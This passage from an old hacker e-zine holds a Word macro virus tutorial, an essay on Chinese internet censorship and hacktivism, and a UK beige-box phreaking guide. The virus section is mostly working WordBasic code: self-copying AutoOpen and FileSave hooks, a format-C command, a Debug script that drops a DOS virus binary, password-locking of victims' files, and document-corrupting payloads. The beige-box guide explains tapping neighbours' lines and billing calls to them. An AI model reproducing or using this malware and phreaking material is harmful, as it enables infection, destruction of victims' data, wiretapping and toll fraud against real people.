wanted to make the macro run-only > We use MacroCopy From$,to$,1 where the ,1 > indicates run-only [5] - More Macro Names Macro names can be special , so it runs at a certain time, and these are them: Auto Open : Whenever a file is opened Auto New : Whenever a file is created Auto Close : Whenever a file is closed And Now , the menu-macros FileSave : When the user selects Save from the file menu. FileSaveAs : When the user selects SaveAs from the file menu. ToolsMacro : When the user selects Macro... from the tools menu By now you should have got the idea. [6] - Infecting With FileSave(As) When You go into Tools|Macro And create a macro called FileSave, it'll look like this (I hope). Sub MAIN Dim dlg As FileSave GetCurValues dlg Dialog dlg FileSave dlg End Sub Now If we want to infect the file, we're going to have to copy our macros: Sub MAIN Dim dlg As FileSave GetCurValues dlg Dialog dlg 'Do The Dialog MacroCopy "Global:FileSave", WindowName$() + ":FileSave", 1 MacroCopy "Global:AutoOpen", WindowName$() + ":AutoOpen", 1 'Copy this macro and another,and make it run only Dlg.Format = 1 FileSaveAs dlg 'Do the file Saveas! End Sub Understand yet ? What we do is let them choose the file, then copy the macro into it. And now FileSaveAs Sub MAIN Dim dlg As FileSaveAs GetCurValues dlg Dialog dlg FileSaveAs dlg End Sub And the evil FileSaveAs Sub MAIN Dim dlg As FileSaveAs GetCurValues dlg Dialog dlg 'do the Dialog If (Dlg.Format = 0) Or (Dlg.Format = 1) Then 'If the dumbss is ssaving it as a template or a 'Word Document MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1 MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1 'Copy the Macros! Dlg.Format = 1 End If FileSaveAs dlg End Sub By now you will have a viral macro (almost) which infects When you open a document. Or use the FileSaveAs or FileSave commands. Although apart from the obvious fact that some of the macros dont copy all three viral macros, there is NO PAYLOAD!! [7] - Payloads : The Best Part Of A Macro For those without viral knowledge, a payload is the part of the macro that causes damage. Like in wazzu , it randomly puts words in other places then it might put "wazzu " in the documents. A virus is only as good as its payload ! + Dos commands > For Dos Commands LIke Dir /ogne/b >>list.txt > Use this format which I nicked from formatC trojan > sCmd$ = "dir /ogne/b >> list.txt" > Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0 > To format C: use "echo y | format c:/u/v:foo>nul" > i think :) tesdt this with "echo y | pause" or > and check the error level use choice + Debug fun When you want to drop a real virus you generally to use debug, but there is another method. This is the revamped code from the Nuclear Virus which uses only one batch file: > VER$ = GetSystemInfo$(24) > If VER$ = "4.0" Then > ChDefaultDir "C:\WINDOWS\COMMAND", 5 > ' find Debug > Else > ChDefaultDir "C:\DOS", 5 > End If > Open "DEBUG.EXE" For Input As #1 > 'And check its a home > Close #1 > Open "c:\ph33r.bat" For Output As #1 > Print #1, "@echo off" > Print #1, "echo N PH33R.COM > ph33r.scr" > Print #1, "echo E 0100 E8 47 00 06 1F BF 00 01 57 B8 CD 20 AB B8 00 00 >> ph33r.scr" > Print #1, "echo E 0110 AB 33 C0 33 DB 33 C9 33 D2 33 F6 33 FF C3 E8 29 >> ph33r.scr" > Print #1, "echo E 0120 00 06 1F 8C D8 05 10 00 05 00 00 8E D0 BC 00 00 >> ph33r.scr" > Print #1, "echo E 0130 8C D8 05 10 00 05 00 00 50 B8 00 00 50 33 C0 33 >> ph33r.scr" > Print #1, "echo E 0140 DB 33 C9 33 D2 33 F6 33 FF CB FC B8 FF 51 CD 21 >> ph33r.scr" > Print #1, "echo E 0150 3D 51 FF 74 16 B8 02 FA BA 45 59 32 DB CD 16 8C >> ph33r.scr" > Print #1, "echo E 0160 D8 48 8E D8 33 FF 80 3D 59 77 01 C3 81 6D 03 A7 >> ph33r.scr" > 'Write a Ph33r spreading batch file > Print #1, "echo E 0170 00 81 6D 12 A7 00 8B 45 12 06 8E C0 0E 1F B9 34 >> ph33r.scr" > Print #1, "echo E 0180 05 E8 00 00 5E 81 EE 84 00 F3 A4 8E D9 BE 84 00 >> ph33r.scr" > Print #1, "echo E 0190 BF 2A 01 56 A5 A5 5E BF 5B 04 A5 A5 C7 44 FC 04 >> ph33r.scr" > Print #1, "echo E 01A0 01 8C 44 FE 06 B4 52 CD 21 8C C0 07 8E D8 BE 9E >> ph33r.scr" > Print #1, "echo E 01B0 10 AD 3D 90 90 75 11 AC 3C E8 75 0C 26 C7 06 5B >> ph33r.scr" > Print #1, "echo E 01C0 04 A0 10 26 8C 1E 5D 04 07 C3 3D 50 68 33 33 72 >> ph33r.scr" > Print #1, "echo E 01D0 3D 3D FE 51 75 03 86 E0 CF 3D 00 4B 74 0F 80 FC >> ph33r.scr" > Print #1, "echo E 01E0 3D 74 0A 80 FC 56 74 05 80 FC 43 75 3C 9C 60 1E >> ph33r.scr" > Print #1, "echo E 01F0 06 B8 0A 00 8C CB CD 31 8E C0 E8 43 00 07 1F 61 >> ph33r.scr" > Print #1, "echo E 0200 9D E9 25 00 3D FF 51 75 0C 86 E0 CF 51 61 72 6B >> ph33r.scr" > Print #1, "echo E 0210 2F 56 4C 41 44 3D 00 4B 74 14 80 FC 6C 74 0F 80 >> ph33r.scr" > Print #1, "echo E 0220 FC 56 74 0A 80 FC 43 74 05 EA 00 00 00 00 06 52 >> ph33r.scr" > Print #1, "echo E 0230 80 FC 6C 75 02 89 F2 0E 07 E8 04 00 5A 07 EB E9 >> ph33r.scr" > Print #1, "echo E 0240 9C 50 53 51 52 56 57 1E 06 FC 89 D6 AC 3C 00 75 >> ph33r.scr" > Print #1, "echo E 0250 FB 83 EE 04 AD 0D 20 20 3D 65 78 74 0A 3D 64 6C >> ph33r.scr" > Print #1, "echo E 0260 74 05 3D 63 6F 75 24 81 7C FB 38 36 74 1D 8B 44 >> ph33r.scr" > Print #1, "echo E 0270 FB 0D 20 20 3D 61 76 74 12 3D 64 76 74 0D 3D 61 >> ph33r.scr" > Print #1, "echo E 0280 6E 74 08 3D 6F 74 74 03 E8 0A 00 07 1F 5F 5E 5A >> ph33r.scr" > Print #1, "echo E 0290 59 5B 58 9D C3 FC B8 02 3D E8 B8 02 73 01 C3 93 >> ph33r.scr" > Print #1, "echo E 02A0 06 1F B4 3F B9 00 02 BA 34 05 E8 A7 02 BE 34 05 >> ph33r.scr" > Print #1, "echo E 02B0 8B 04 0D 20 20 3D 6D 7A 74 03 E9 A2 00 81 7C 12 >> ph33r.scr" > Print #1, "echo E 02C0 AF AF 75 03 E9 E9 00 83 7C 18 40 72 03 E9 E6 00 >> ph33r.scr" > Print #1, "echo E 02D0 83 7C 0C FF 75 EE E8 36 03 0B D2 75 05 3D E8 03 >> ph33r.scr" > ' Still Going :| > Print #1, "echo E 02E0 72 E2 B9 00 02 F7 F1 40 39 44 04 77 D7 8B 44 0E >> ph33r.scr" > Print #1, "echo E 02F0 A3 29 00 8B 44 10 A3 2E 00 8B 44 14 A3 3A 00 8B >> ph33r.scr" > Print #1, "echo E 0300 44 16 A3 36 00 E8 07 03 B9 10 00 F7 F1 2B 44 08 >> ph33r.scr" > Print #1, "echo E 0310 83 C2 1E 89 54 14 89 44 16 48 89 44 0E 81 C2 DC >> ph33r.scr" > Print #1, "echo E 0320 05 83 E2 FE 89 54 10 E8 B9 02 B9 34 05 B4 40 33 >> ph33r.scr" > Print #1, "echo E 0330 D2 E8 20 02 E8 D8 02 B9 00 02 F7 F1 0B D2 74 01 >> ph33r.scr" > Print #1, "echo E 0340 40 89 44 04 89 54 02 E8 C1 02 C7 44 12 AF AF B4 >> ph33r.scr" > Print #1, "echo E 0350 40 89 F2 B9 1C 00 E8 FB 01 E8 9C 02 E9 51 00 80 >> ph33r.scr" > Print #1, "echo E 0360 7C 03 AF 74 4B BF 0A 00 A5 BF 0E 00 A5 B8 02 42 >> ph33r.scr" > Print #1, "echo E 0370 33 C9 99 E8 DE 01 0B D2 75 36 3D 60 EA 77 31 3D >> ph33r.scr" > Print #1, "echo E 0380 00 04 72 2C 2D 03 00 A3 1B 05 E8 56 02 B4 40 B9 >> ph33r.scr" > Print #1, "echo E 0390 34 05 33 D2 E8 BD 01 72 17 B8 00 42 33 C9 99 E8 >> ph33r.scr" > Print #1, "echo E 03A0 B2 01 B4 40 B9 04 00 BA 1A 05 E8 A7 01 E8 48 02 >> ph33r.scr" > Print #1, "echo E 03B0 B4 3E E8 9F 01 C3 FF 74 3C 8F 06 1E 05 83 6C 3C >> ph33r.scr" > Print #1, "echo E 03C0 08 83 7C 3E 00 75 E9 C7 44 12 AF AF B8 00 42 33 >> ph33r.scr" > Print #1, "echo E 03D0 C9 99 E8 7F 01 E8 0B 02 B4 40 B9 00 02 BA 34 05 >> ph33r.scr" > Print #1, "echo E 03E0 E8 71 01 72 CB B8 00 42 8B 16 1E 05 33 C9 E8 63 >> ph33r.scr" > Print #1, "echo E 03F0 01 B4 3F B9 00 02 BA 34 05 E8 58 01 8B 44 22 39 >> ph33r.scr" > Print #1, "echo E 0400 44 04 72 04 83 44 04 08 39 44 24 72 04 83 44 24 >> ph33r.scr" > Print #1, "echo E 0410 08 39 44 26 72 04 83 44 26 08 39 44 28 72 04 83 >> ph33r.scr" > Print #1, "echo E 0420 44 28 08 39 44 2A 72 04 83 44 2A 08 8B 44 1C FF >> ph33r.scr" > Print #1, "echo E 0430 44 1C 33 D2 B9 08 00 F7 E1 03 44 22 83 D2 00 B9 >> ph33r.scr" > Print #1, "echo E 0440 00 02 F7 F1 A3 22 05 89 16 24 05 FF 74 14 8F 06 >> ph33r.scr" > 'And on.... > Print #1, "echo E 0450 32 05 FF 74 16 8F 06 30 05 FF 74 32 8F 06 20 05 >> ph33r.scr" > Print #1, "echo E 0460 C7 44 14 5F 04 8B 44 1C 89 44 16 FF 36 1E 05 8F >> ph33r.scr" > Print #1, "echo E 0470 06 26 05 A1 22 05 0B C0 74 3C FF 0E 22 05 B8 00 >> ph33r.scr" > Print #1, "echo E 0480 42 33 C9 8B 16 26 05 83 EA 08 E8 C7 00 B4 40 B9 >> ph33r.scr" > Print #1, "echo E 0490 00 02 89 F2 E8 BD 00 81 06 26 05 00 02 B8 00 42 >> ph33r.scr" > Print #1, "echo E 04A0 33 C9 8B 16 26 05 E8 AB 00 B4 3F BA 34 05 B9 00 >> ph33r.scr" > Print #1, "echo E 04B0 02 E8 A0 00 EB BD B8 02 42 33 C9 99 E8 95 00 8A >> ph33r.scr" > Print #1, "echo E 04C0 0E 20 05 53 BB 01 00 D3 E3 8B CB 5B F7 F1 C7 06 >> ph33r.scr" > Print #1, "echo E 04D0 28 05 00 00 0B D2 74 07 29 D1 89 0E 28 05 40 89 >> ph33r.scr" > Print #1, "echo E 04E0 F7 03 3E 24 05 89 05 C7 45 02 34 05 C7 45 04 80 >> ph33r.scr" > Print #1, "echo E 04F0 01 C7 45 06 34 07 B8 00 42 33 C9 8B 16 26 05 83 >> ph33r.scr" > Print #1, "echo E 0500 EA 08 E8 4F 00 B4 40 8B 0E 24 05 83 C1 08 BA 34 >> ph33r.scr" > Print #1, "echo E 0510 05 E8 40 00 FF 36 DF 04 FF 36 E1 04 C7 06 DF 04 >> ph33r.scr" > Print #1, "echo E 0520 00 00 C7 06 E1 04 FF FF B8 02 42 33 C9 8B 16 28 >> ph33r.scr" > Print #1, "echo E 0530 05 E8 20 00 B4 40 B9 34 05 33 D2 E8 16 00 8F 06 >> ph33r.scr" > Print #1, "echo E 0540 E1 04 8F 06 DF 04 B4 40 B9 0A 00 BA 2A 05 E8 03 >> ph33r.scr" > Print #1, "echo E 0550 00 E9 59 FE 9C 2E FF 1E 5B 04 C3 00 00 00 00 60 >> ph33r.scr" > Print #1, "echo E 0560 1E 06 B8 FE 51 CD 21 3D 51 FF 74 6F B8 0A 00 8C >> ph33r.scr" > Print #1, "echo E 0570 CB CD 31 8E D8 B8 04 02 B3 21 CD 31 89 16 2A 01 >> ph33r.scr" > Print #1, "echo E 0580 89 0E 2C 01 89 16 5B 04 89 0E 5D 04 B8 01 05 33 >> ph33r.scr" > Print #1, "echo E 0590 DB B9 34 07 CD 31 53 51 33 C0 B9 01 00 CD 31 8B >> ph33r.scr" > Print #1, "echo E 05A0 D8 B8 07 00 5A 59 CD 31 B8 08 00 33 C9 BA 34 07 >> ph33r.scr" > Print #1, "echo E 05B0 CD 31 8E C3 B9 34 07 33 F6 33 FF FC F3 A4 8C C3 >> ph33r.scr" > Print #1, "echo E 05C0 B8 09 00 B9 FF 00 CD 31 8C C1 BA D1 00 B8 05 02 >> ph33r.scr" > Print #1, "echo E 05D0 B3 21 CD 31 B8 04 00 06 5B CD 31 07 1F 61 EA 00 >> ph33r.scr" > Print #1, "echo E 05E0 00 FF FF 50 51 52 B8 00 57 E8 68 FF 89 0E FF 04 >> ph33r.scr" > Print #1, "echo E 05F0 89 16 FC 04 5A 59 58 C3 50 51 52 BA 00 00 B9 00 >> ph33r.scr" > Print #1, "echo E 0600 00 B8 01 57 E8 4D FF 5A 59 58 C3 B0 00 EB 02 B0 >> ph33r.scr" > Print #1, "echo E 0610 02 B4 42 33 C9 99 E8 3B FF C3 E9 00 00 AF 00 00 >> ph33r.scr" > Print #1, "echo E 0620 00 00 00 00 00 00 00 00 00 00 01 00 03 04 DF 04 >> ph33r.scr" > Print #1, "echo E 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >> ph33r.scr" > Print #1, "echo E 0830 00 00 00 00 >> ph33r.scr" > Print #1, "echo RCX >> ph33r.scr" > Print #1, "echo 0734 >> ph33r.scr" > Print #1, "echo W >> ph33r.scr" > Print #1, "echo Q >> ph33r.scr" > Print #1, "debug < ph33r.scr > nul" > Print #1, "del ph33r.scr" > Print #1, "ph33r.com" > Print #1, "del c:\ph33r.bat" > Print #1, "" > Close #1 > Shell "ph33r.bat", 0 Big eh ? , this debug method is good for anything & everything. + Colors This is the ingenious code from the Colors virus which randomly changes the system colours every so-often. This code can be rewritten so that all the colors are the same. > Dim Shared sColors$(21) > Sub sColors > On Error Goto benice > sColors$(0) = "Background" > sColors$(1) = "AppWorkspace" > sColors$(2) = "Window" > sColors$(3) = "WindowText" > sColors$(4) = "Menu" > sColors$(5) = "MenuText" > sColors$(6) = "ActiveTitle" > sColors$(7) = "InactiveTitle" > sColors$(8) = "TitleText" > sColors$(9) = "ActiveBorder" > sColors$(10) = "InactiveBorder" > sColors$(11) = "WindowFrame" > sColors$(12) = "Scrollbar" > sColors$(13) = "ButtonFace" > sColors$(14) = "ButtonShadow" > sColors$(15) = "ButtonText" > sColors$(16) = "GrayText" > sColors$(17) = "Hilight" > sColors$(18) = "HilightText" > sColors$(19) = "InactiveTitleText" > sColors$(20) = "ButtonHilight" > For i = 0 To 20 > SetProfileString("colors", sColors$(i), Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256))) > Next i > BeNice: > End sub + The GoldFish This has to be my favorite payload :0 apart from the many lunch virii, it almost The most creative and original virus. > sub goldfish > Begin Dialog UserDialog 228, 163, "GoldFish" > TextBox 35, 76, 160, 18,.TextBox1$, 0 > Text 35, 21, 139, 13, "I am the GoldFish," > Text 33, 43, 165, 13, "I am hungry, feed me." > OKButton 66, 115, 88, 21 > End Dialog > 'Write the dialog ox > Dim dlg As UserDialog > A$ = "" > On Error Goto 2 > 2: err = 0 > While A$ <> "fishfood" And A$ <> "worms" And A$ <> "worm" And A$ <> "pryme" And A$ <> "core" > Dialog(dlg) > GetCurValues dlg > A$ = LCase$(dlg.TextBox1$) > Wend > Next > end sub + Passwording Files This is an *evil* activity - use with caution Dont EVER USE A RANDOMIZED PASSWORD! If you fuck up, a lot fucks up. A better strategy is to calculate a password from a system variable or a constant (like a file name), or store them in a file, perhaps encrypted. > On Error Goto ErrorRoutine > Dim dlg As FileSaveAs > GetCurValues dlg > Dialog dlg > If dlg.Format = 0 Then dlg.Format = 1 > dlg.Format = 1 > Infect(Dlg.Name) > Dlg.Password = "sucker" > End If > FileSaveAs dlg > End Sub + Screen Saver :) The other creative payload. Whoever figured this out must have been a registry genius. > Sub ScreenSaver > On Error Goto Int24h > If GetSystemInfo$(21) = "Windows" Then > sstext="Hello and Welcome to your infected machine...." > SetPrivateProfileString("Boot", "SCRNSAVE.EXE", "C:\WINDOWS\SSMARQUE.SCR", "C:\WINDOWS\SYSTEM.INI") > SetPrivateProfileString("Windows", "ScreenSaveActive", "1", "C:\WINDOWS\WIN.INI") > SetPrivateProfileString("Windows", "ScreenSaveTimeOut", "60", "C:\WINDOWS\WIN.INI") > SetPrivateProfileString("Screen Saver.Marquee", "Text", sstext$ , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "PWProtected", "0" , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "Font", "Arial" , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "Size", "48" , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "Speed", "21" , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "Attributes", "00010" , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "CharSet", "0" , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "BackgroundColor", "0 0 128" , "C:\WINDOWS\CONTROL.INI") > SetPrivateProfileString("Screen Saver.Marquee", "TextColor", "255 255 255" , "C:\WINDOWS\CONTROL.INI") > End If > Int24h: > Err = 0 > End Sub + Kwijibo This is the Kwijibo viral payload loosely based on the wazzu virus. > Sub MAIN > FileSummaryInfo .Update > Dim dlg As DocumentStatistics > GetCurValues dlg > rem update document values > For i = 1 To (5 *rnd()) > If Rnd() < 0.3 Then > rem Randomly > wordNum = Int(Rnd() * Val(dlg.Words)) > rem Pick a random word > StartOfDocument > WordRight wordNum > SelectCurWord > rem Select it > Word$ = Selection$() > DeleteWord > revword$="" > for i=1 to len(word$) > revword$=mid$(word$,i,1)+revword$ > next > Insert " "+revword$+" " > rem reverse it for no apparent reason > End If > Next > If rnd()<0.25 > wordNum = Int(Rnd() * Val(dlg.Words)) > StartOfDocument > WordRight wordNum > rem Then pick a random position > insert " (Think Kwijibo) " > rem and you should of guessed it by now > end if > end sub + Removing Buttons > ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Cancel", .Remove, .Context = 0 To all who don't understand: It removes the cancel button! Then trying sending close-all + Sendkeys > SendKeys "%"+"{F4}" Guess what this is >SendKeys "^" + "%" + "-" Close all ! + MsgBoxes > Again: > MsgBox"Phuk You !" > Goto Again [8] - Related Commands + Using Counters > SUB Counter > Counter = iCounter("myevilcounter") > iTotal=100 > While Counter>iTotal > Counter=Counter-iTotal > wEnd > If iTotal=Counter > Call Payload > End If > End Sub This code Can be asily modified to store Anything in an ini file ! > Funcion iCounter (counter$) > sVar$ = GetProfileString$("windows", counter$) > iCounter = Val(sVar$) > iCounter=iCounter+1 > SetProfileString "windows", counter$, Str$(iCounter) > End Function + Operating system check > Sub MAIN > o$=opersy$ > if o$="Windows" then > insert " sucker " > else > insert " mac lover " > endif > End Sub > > Function OperSy$ > opersy$ = "" > On Error Goto windows > opersy$ = GetSystemInfo$(512) > Goto Endin > windows: > opersy$ = GetSystemInfo$(21) > Endin: > End Function + Randomizing Strings > Rnd Password > Function ran$(length) > ran$="" > for i=1 to length > a$=chr$(Int((Rnd()*94)+32)) > ran$=ran$+a$ > next > end function or > a$=chr$(Int((Rnd()*94)+32)) > b$=chr$(Int((Rnd()*94)+32)) > c$=chr$(Int((Rnd()*94)+32)) > d$=chr$(Int((Rnd()*94)+32)) > e$=chr$(Int((Rnd()*94)+32)) > f$=chr$(Int((Rnd()*94)+32)) > g$=chr$(Int((Rnd()*94)+32)) > h$=chr$(Int((Rnd()*94)+32)) 8 charcters, evil for passwords + Other Evil Commands > ExitWindows Guess what this one does, good after a heavy payload. > DisableInput 1 Stop the evil people pressing esc to stop the macro > ScreenUpdating 0 Stop the screen updating > DisableAutoMacros 0 Enable AutoMacros > ToolsOptionsSave .GlobalDotPrompt = 0 Stop the Global dotprompt prompt > ScreenUpdating 1 Screen Updating On > DisableInput 0 Enable Input > ToolsCustomizeMenus .Name = "FileTemplates", .Menu = "File", .Remove Remove the FileTemplates Menu > ToolsCustomizeMenus .Name = "ToolsCustomize", .Menu = "Tools", .Remove Remove ToolsCustomize > ToolsCustomizeMenus .Name = "ToolsMacro", .Menu = "Tools", .Remove Remove ToolsMacro + Orgaizer Methods > From$=FileName$() > To$="Global" > Name$="AutoOpen" > Organizer .Copy, .Source = from$, .Destination = To$, .Name = name$, .Tab = 3 Copies the macro (name$) from from$ to to$ > ToolsMacro .Name = "MacroName", .Show = 1, .Delete Delete Macro > Organizer .Rename, .Source = NormalPath$, .Name = "AutoOpen", .NewName = "mswAO", .Tab = 3 Rename Macro :..::..End Of File..::..: :..::.File 10 Of 13.::..: :.:..China In Turmoil.:.: :..::.:.By Cyborg.:.::..: <*> Communist China. Ouch. Riddled with corrupt agendas and humans rights abuses eastern civilisation leaves a lot to be desired. China hasn't always been a favourite country for freedom fighters. However, in recent times oppression does not always come in identifyable forms, for you see there is a digital cloud forming over the ancient society. A new construction has been put in place to repel invaders and protect Chinese citizens from their foreign ideas. Dubbed "The Great Firewall" it is a series of online blocks and filters installed into ISPs, Net Cafes, Networks, Schools and anywhere else that it is possible. This sickens me. Don't get me wrong. I have no problem with Marxist views, in fact I greatly admire the ideology of socialism, but communism need not entail the strict censorship and totalitarian regime which the Chinese government enforce. But it doesn't have to end like that. There is an online rebellion taking place. Rage against the system. Hackers in every sense of the word have already found ways around this intrusion. They refer to themselves hacktivists, it an amalgamation on the words hack and activists. They have defaced government websites and torn down firewalls. It must be hard for them to crack the passwd files because not many people have a Chinese wordlist :P. I felt proud when I heard that. Finally the scene is going somewhere. Everyone knows that the hacker community has evolved in a bad way, some dude in an IRC channel needs to know how to use netbus, fuck that. The modern age debate is whether or not it is immoral to harm or destroy the information infrastructures of another country. Now as this is a sensitive topic I must outline my views very clearly. I do NOT agree with tearing down networks or aborting net service but I feel that uploading a protest to a government website acceptable. I also gladly encourage those who spread and upload 'unwelcome' information. Even though hacking is not usually thought of in terms of extending free speech it is vital in this case. All the major hacking groups such as Chaos Computer Club, 2600, l0pht, cDc and more have signed a pact denouncing the activities of LoU (Legions of the Underground). I must strongly disagree with some but not all of this statement. What LoU did was upload protests over human rights abuses to Chinese governmental web sites. For that I applaud them. However, declaring war on all their computers systems sounds like another Clinton solution. We shouldn't try to attack them into submitting but rather try to make them see what they are doing is wrong and not acceptable in the eyes of the world. I have heard of other groups rising up and vowing to become part of the online revolution but so far they are immersed in the planning stage. I wish them all the luck in the world. Hacktivists are the children of a revolution and people who say that hacking countries who execute and mistreat their citizens is immoral probably go home to their rich, comfortable lifestyles and ponder some more about their almighty ethics. Although I don't agree with the groups who signed the pact I do understand why they signed it. The US are a world power and many innocent people have perished to satisfy 'the pursuit of happiness'. President Clinton can't be having people stopping his flow of extra pocket money. If you don't know what I'm talking about think back to two years ago when they uncovered yet another White House scam. It seems Mr. Clinton was being paid by Chinese businessmen to pose for photographs. Now having products endorsed by one of the most powerful men in the world is a sure seller for any product. The Great Firewall is not the only immoral attempt of regulating the internet to 'protect' Chinese citizens from Western influence. The Chinese president Jiang Zemin has issued a sort of cyber police state on the internet to patrol/monitor China based public IRC channels and newsgroups. A warning has been issued to all online artists and programmers which goes something along the lines of "Don't fuck with China". It seems we would be well advised to challenge this authority or face a censored world. Wait, it gets worse, the People's Liberation Army in Shenyang are conducting tests on virus warfare. This is just wrong. When world powers start screwing around with virii guess who's going to be engulfed in the crossfire... people like you and me. In China hackers are executed for breaking into banks and ordinary hackers are imprisoned for lesser crimes. Kevin Mitnick can thank his lucky stars he's not living in a 'socialist paradise'. I hear the jail cells in China are less than enticing... :..::..End Of File..::..: :..::.File 11 Of 13.::..: :.::.UK Boxing Guide.::.: :.::...By Darkflame..::.: <*> UK Boxing Part I -The Beige Box-. Introduction: This file deals with some of the ways a beige box can be constructed and used. This is a simple but rewarding box. There are many other texts available on this subject, so please do not take this as a definitive guide. I know this subject has been covered before, but I feel this is a good subject to start with. <*> So what's Beige Boxing then? Beige boxing is the phone you see your average BT engineer carrying. It is called a linesman's handset. There are lots of uses for a beige box and, although almost everyone knows how to beige box, there are some that don't, making this file a worthwhile one. <*> So what exactly will I need? You will need the following to construct a permanent beige box: 1. A cheap phone. A fine one would be Arg0s Cat. No. 550/1054 2. A pair of crocodile clips. 3. A pair of wire clippers. 4. A screw driver. 5. Soldering iron. 6. An extra phone cord. <*> So how is the damn thing made? Step #1 - Open up your telephone with your screw driver. Be sure not to do this with too much force as you don't want to leave things loose. Step #2 - Look at the insides of your phone, you should see a green & a red wire. These are the ones we are interested in. Follow them back to the screw/pin (usually a screw although I have seen a pin, which had to be removed completely) and then solder your phone cord to the screws, and solder it down. Step #3 - Run your extra telephone cord out the whole modular jack's hole. Sometimes you can't get it through (cough) so you should cut the wires that lead to it with your wire cutters to leave plenty of room. Step #4 - Put your phone back together and make sure it's securely fastened. Step #5 - At the end of your extra phone cord, which is now hanging out of the phone, connect your set of croc clips to the same wires hooked up to the screws inside your telephone. You can connect them by soldering. <*> What can I do with the thing now I've made it? So now you have made your first beige box you'll want to use it, correct? NO! That's illegal and I can take no responsibilty for what you do with your newly constructed beige boxe. If you were doing it for official purposes however you would go outside, and somewhere on your street you should see a big green box. Find a remote one and take a wrench to it. Inside the box, you should see four screws with the red & green wires connected to them. You would then hook the croc clips up to the screws. This is the bit where you put your phone to your ear and hope you hear a dial tone. Enjoy the feeling if you do! If you didn't, make sure the box is connected properly and that you're hooked up to the right terminals. If you *still* don't get one it's my fault, and you haven't made your box properly :( If you did get a dial tone and can't work out the next step please ask for detailed instructions on the alt.2600 newsgroup :) <*> Anything else? Yes! You can effectively use your beige box to tap into a neighbour or enemy's phone line. When you connect up your nice little beige box and you hear a voice its the line being used, and you can here third party to whatever they are saying, but I'm not sure if you do speak they will be able to hear you... A good idea is to make a map of all the phones that go into your green box. So you can decide who's bill you'd like to be slightly higher, but don't call anything too extravagant or they will click they haven't actually phoned this number, know what I mean? Conclusion: I don't know very much about beige boxing, but that is what I do know. I hope it helped someone out there :) I have read a good few files on this subject, hopefully making this text accurate. If this is not correct please feel free to e-mail me telling me so. This was not meant as a comprehensive guide, as it isn't a very deep subject. Just to give all the 